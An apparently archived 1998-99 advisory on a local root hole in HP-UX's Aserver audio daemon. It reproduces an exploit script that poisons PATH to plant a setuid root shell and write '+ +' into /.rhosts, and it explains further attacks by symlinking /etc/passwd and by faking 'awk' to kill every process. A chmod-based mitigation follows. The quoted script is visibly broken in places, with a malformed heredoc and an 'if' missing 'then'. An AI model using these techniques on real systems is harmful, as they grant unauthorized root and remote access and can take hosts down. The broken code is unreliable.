COMMAND

    /opt/audio/bin/Aserver

SYSTEMS AFFECTED

    HP9000 Series 7/800 running HP-UX releases 10.X and 11.X

PROBLEM

    'Loneguard' posted  following.   It's aserver  exploit which  will
    make .rhosts for you:

        #!/bin/sh
        #
        # HP-UX aserver.sh - Loneguard 18/10/98
        # Simple no brainer path poison followed by a twist [ inspired by DC ;) ]
        #
        cd /var/tmp
        cat < _EOF > ps
        #!/bin/sh
        cp /bin/csh /var/tmp/.foosh
        chmod 4755 /var/tmp/.foosh
        _EOF
        chmod 755 ps
        PATH=.:$PATH
        /opt/audio/bin/Aserver -f
        if [ -e /var/tmp/.foosh ]
	        # Hmmm, you not like that technique?
	        cd /tmp
	        rm last_uuid
	        ln -s /.rhosts last_uuid
	        /opt/audio/bin/Aserver -f
	        echo "+ +" > /.rhosts
	        # Haha, my Kungfu is the best!
        fi
        echo Crazy MONKEY!

    Justin Tripp was intrigued by aserver.sh exploit script posted  by
    Loneguard and decided  to do some  of his own  investigation.  The
    results are as follows:

    1. Aserver  will not  run on  a machine  that does  not have Audio
       Hardware.   Thus  all  beep  only  machines  are  safe.   (e.g.
       705?,710,720,730,750,  etc.)  800s  may  or  may not have audio
       hardware (little  experience with  them).   If you  try to  run
       Aserver it poops out:

        failed to open /dev/audioIL - Aserver exiting

    2. There  are atleast  two different  (if not  three) versions  of
       Aserver.   Due to  Y2K Justinn  only had  access to  two (since
       almost all the machines available had the lastest and  greatest
       patches).

        oldmach> what /opt/audio/bin/Aserver
        /opt/audio/bin/Aserver:
        X Window System, Version 11 R5+ HP-UX B.10.10.00 Oct 1998 Patch Release (build date: Wed Oct 14 06:02:49 MDT 1998)

        newmach> what /opt/audio/bin/Aserver
        /opt/audio/bin/Aserver:
        X Window System, Version 11 R5+ HP-UX B.10.10.00 June 1999 Patch Release (build date: Thu Jun  3 22:18:56 MDT 1999)

       The lastest patches  probably bring your  Aserver to the  Jun99
       version.  But the Oct98 version is also fairly current.

    3. Aserver  seems to  have some  system() calls  that run external
       unix commands.  strings reveals the nature of the commands:

        Oct98
        ps -e | grep Aserver | grep -v grep | grep -v %s  > /dev/null

        Jun99
        /usr/bin/ps -e | /usr/bin/grep Aserver | /usr/bin/grep -v grep | /usr/bin/grep -v %s  > /tmp/null
        kill `awk '{print $1}' /tmp/null` 2>/dev/null

    4. Loneguard's script only  worked partially on the  Oct98 version
       of Aserver.   Loneguards script does  not work at  all with the
       Jun99 version.  The Jun99 version can be exploited too, but  in
       a different way.

    Loneguard's script uses the fact that the path is not specifed  in
    the system call  and thus you  can substitute your  own version of
    ps for the  one that is  to be called.   Since you can  change the
    path ordering it is possible to run whatever commands you want  as
    root.  Justin was unable  to duplicate the bad permissions  on the
    temporary file  /tmp/last_uuid.   Neither version  of Aserver  had
    that file name in the binary nor did they seem to create it.

    The Jun99  version foils  this by  putting the  path in  for every
    command.   But they  give you  some more  weapons that make things
    just as easy.  Instead  of ignoring the output, Aserver  saves the
    output  into  file  /tmp/null.   Since  it  does  this  as  system
    command, the program does not check to see if file already  exists
    or not,  so if  there is  some troublesome  file or  something you
    want to over write simply:

        ln -s /etc/passwd /tmp/null

    And then the file will be  overwritten.  Reboot the HP box  and it
    will beg your for  a root password(seriously).   Unfortunately the
    only thing that goes into /tmp/null is the output from ps -e  (but
    maybe somebody can figure out a way to make + + appear in that).

    It  is  funny  that  HP  fixed  their earlier problem in the Oct98
    version of Aserver in the  Jun99 version, but they introduced  the
    same problem in a different way.  Aserver -f is used to force  the
    Aserver to replace the currently  running copy.  (Aserver has  the
    habit of failling  or doing weird  things.)  So  the Jun99 version
    looks  for  running  copies  and  then  kills  them  with the kill
    statement:

        kill `awk '{print $1}' /tmp/null` 2>/dev/null

    Well looky here  we can write  a script named  'awk' and place  it
    before /bin in my  execution path and do  the same thing with  the
    Jun99 version as we  can with the Oct98.   An attempt was made  to
    fix it, but it introduced the same bug again...

    The above  system call  could also  be used  as a  process killer.
    Since you  can rewrite  what awk  will return,  you could  have it
    echo "-1" and take the whole box down.  Feel free to be creative.

SOLUTION

    Until a patch is available, the only two temporary fixes currently
    available are  to disable  /opt/audio/bin/Aserver by  removing the
    file, or to remove execute permissions as follows.  As root remove
    functionality with:

        chmod 555 /opt/audio/bin/Aserver

    Until a patch  is available that  fixes the problem  installing an
    Aserver patch will restore the original permissions.  It is  safer
    to set the 555 permissions each  time the system is started.   One
    way  to  do  that  is  to  create  /sbin/rc2.d/S769audio  with 555
    permissions containing the following script:

        #!/sbin/sh
        
        PATH=/sbin:/usr/sbin:/usr/bin
        export PATH
        
        case $1 in
        start_msg)
               echo "chmod 555 /opt/audio/bin/Aserver"
               ;;
        
        'start')
               chmod 555 /opt/audio/bin/Aserver
               ;;
        
        *)
               echo "usage: $0 start"
               ;;
        esac
        
        exit 0